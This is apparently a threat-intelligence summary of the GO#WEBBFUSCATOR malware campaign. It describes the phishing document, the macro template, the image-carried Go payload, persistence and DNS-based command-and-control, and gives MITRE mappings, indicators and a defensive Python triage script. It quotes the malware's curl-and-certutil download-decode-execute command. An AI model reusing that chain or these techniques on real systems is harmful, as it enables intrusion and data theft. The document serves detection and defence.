Securonix Threat Labs uncovered a Golang-based GO#WEBBFUSCATOR campaign that leverages a James Webb image and obfuscated Go payloads to infect targets. The attack chain starts with a phishing Office attachment, downloads a malicious template, and uses DNS-based C2 with persistence and counter-forensics techniques. #WEBBFUSCATOR #MustangPanda
Key points
- The GO#WEBBFUSCATOR campaign uses Go-based malware and an embedded James Webb deep-field image to deliver its payload.
- Initial access occurs via a phishing email with a Microsoft Office attachment (Geos-Rates.docx) that downloads a malicious template file through an external reference.
- The malicious template contains a VB script (Auto_Open/AutoOpen/AutoExec) that auto-executes when macros are enabled.
- The dropped payload is a 1.7 MB Windows 64-bit binary (msdllupdate.exe) that is heavily obfuscated (ROT25, XOR/Gobfuscation) and decoded from an image carrier.
- Persistence is achieved by copying the binary to %LOCALAPPDATA%\microsoft\vault (as msdllupdate.exe) and creating a startup batch file, backed by a Run key.
- Command-and-control uses DNS-based exfiltration with nslookup and TXT-DNS queries to a set of attacker-controlled domains; a USER_ID is used in subsequent C2 traffic.
- Infrastructure includes newly registered domains (xmlschemeformat.com, updatesagent.com, apiregis.com) and related IPs (185.247.209.255, 139.28.36.222) with a fallback domain for resilience.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Initial infection begins with a phishing email containing a Microsoft Office attachment (Geos-Rates.docx in our case). The document includes an external reference hidden inside the document’s metadata which downloads a malicious template file. [‘Initial infection begins with a phishing email containing a Microsoft Office attachment (Geos-Rates.docx in our case). The document includes an external reference hidden inside the document’s metadata which downloads a malicious template file.’]
- [T1059.003] Windows Command Shell – The deobfuscated code executes the following command: cmd.exe /c … curl … oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe. [‘The deobfuscated code executes the following command which will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary (msdllupdate.exe) and then finally, execute it.’]
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence is achieved by adding an implant binary into %LOCALAPPDATA%\microsoft\vault and creating and executing a batch file: %LOCALAPPDATA%\microsoft\vault\Update.bat. [‘Persistence is achieved by adding an implant binary into %localappdata%\microsoft\vault and creating and executing a batch file.’]
- [T1140] Deobfuscate/Decode Files or Information – The Go binary uses obfuscation (ROT25, XOR) and decodes to reveal the payload and C2 details. [‘The Base64 encoded payload is decrypted and saved into a built Windows executable file called “msdllupdate.exe” as we saw earlier with the certutil command.’]
- [T1420] File and Directory Discovery; [T1016.001] System Network Configuration Discovery; [T1426] System Information Discovery; [T1033] System Owner/User Discovery – Discovery-related content in the article maps to these techniques. [‘Discovery: File and Directory Discovery; System Network Configuration Discovery; System Information Discovery; System Owner/User Discovery.’]
- [T1071.001] Web Protocols; [T1071.004] Application Layer Protocol: DNS; [T1132.001] Data Encoding: Standard Encoding; [T1105] Ingress Tool Transfer; [T1001.002] Data Obfuscation: Steganography – The C2 uses DNS TXT queries and Base64-encoded data; an initial DNS check and subsequent data exchange occur. [‘communication with the C2 server is implemented using TXT-DNS requests using nslookup requests to the attacker-controlled name server. All information encoded using Base64’]
- [T1041] Exfiltration Over C2 Channel – DNS-based exfiltration is used to send data back to the C2. [‘Exfiltration Over C2 Channel’]
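The behaviours mapped above (certutil decoding an image-named carrier, nslookup TXT queries to the listed C2 domains, execution from the vault persistence directory) can be turned into simple triage rules over process-creation records. This is an added example, not Securonix's code; the rule names and the sample events are constructed, and only the domains and paths come from the report.

```python
"""Added example (not from the Securonix report): triage rules for
GO#WEBBFUSCATOR-style behaviour in process-creation records.
Sample events are constructed for illustration."""
import re

# Domains from the report; everything else here is an assumption.
C2_DOMAINS = {"xmlschemeformat.com", "updatesagent.com", "apiregis.com"}
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp)$", re.I)
VAULT_DIR = re.compile(r"\\microsoft\\vault\\", re.I)
TXT_FLAGS = {"-q=txt", "-type=txt", "-querytype=txt"}

# Constructed sample events: (process image path, command line)
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -decode OxB36F8GEEC634.jpg msdllupdate.exe"),
    ("C:\\Windows\\System32\\nslookup.exe",
     "nslookup -q=txt c3dfg.xmlschemeformat.com"),
    ("C:\\Users\\u\\AppData\\Local\\microsoft\\vault\\Msdllupdate.exe",
     "Msdllupdate.exe"),
    ("C:\\Windows\\System32\\certutil.exe", "certutil -verify cert.cer"),
    ("C:\\Windows\\System32\\nslookup.exe", "nslookup www.example.com"),
]


def triage(image, cmdline):
    """Return the names of the rules that fire for one process event."""
    hits = []
    args = cmdline.split()
    low = [a.lower() for a in args]
    name = image.rsplit("\\", 1)[-1].lower()
    # Rule 1: certutil -decode whose input is named like an image (T1140/T1105)
    if name == "certutil.exe" and "-decode" in low:
        i = low.index("-decode")
        if i + 1 < len(args) and IMAGE_EXT.search(args[i + 1]):
            hits.append("certutil_decode_image_carrier")
    # Rule 2: nslookup TXT query to a known C2 domain or subdomain (T1071.004)
    if name == "nslookup.exe" and TXT_FLAGS & set(low):
        for a in low[1:]:
            dom = a.rstrip(".")
            if any(dom == d or dom.endswith("." + d) for d in C2_DOMAINS):
                hits.append("nslookup_txt_to_c2_domain")
                break
    # Rule 3: process started from the persistence directory (T1547.001)
    if VAULT_DIR.search(image):
        hits.append("exec_from_localappdata_vault")
    return hits


def triage_all(events=SAMPLE_EVENTS):
    """Return (image name, fired rules) for every event with at least one hit."""
    out = [(img.rsplit("\\", 1)[-1], triage(img, cmd)) for img, cmd in events]
    return [(n, h) for n, h in out if h]
```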
Indicators of Compromise
- [Network indicators] xmlschemeformat.com, updatesagent.com, and apiregis.com – DNS domains used for C2 and fallback infrastructure
- [Network indicators] 185.247.209.255, 139.28.36.222 – IP addresses associated with the C2 infrastructure
- [Host-based indicators] %LOCALAPPDATA%\microsoft\vault\Msdllupdate.exe, %LOCALAPPDATA%\microsoft\vault\Update.bat, %LOCALAPPDATA%\microsoft\windows\MsSafety\Msdllupdate.exe, %LOCALAPPDATA%\microsoft\vault\MsDb.db – Local persistence and data artifacts
- [Host-based indicators] Geos-Rates.docx (da43ec30fe12c45529e51a0c986a856aa8772483875356f29382ac514788f86d) – Initial document used in phishing
- [Host-based indicators] form.dotm (383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f) – Malicious template reference
- [Host-based indicators] OxB36F8GEEC634.jpg (3bdf6d9f0f35be75d8345d897ec838ae231ba01ae898f6d0c8f920ff4061fc22) – Image carrier for the Base64 payload
- [Host-based indicators] msdllupdate.exe (d09af37cdbae7273e4e7c79b242023ffdb07c8ccab2280db7fe511d2b14ad19c) – Decoded payload executable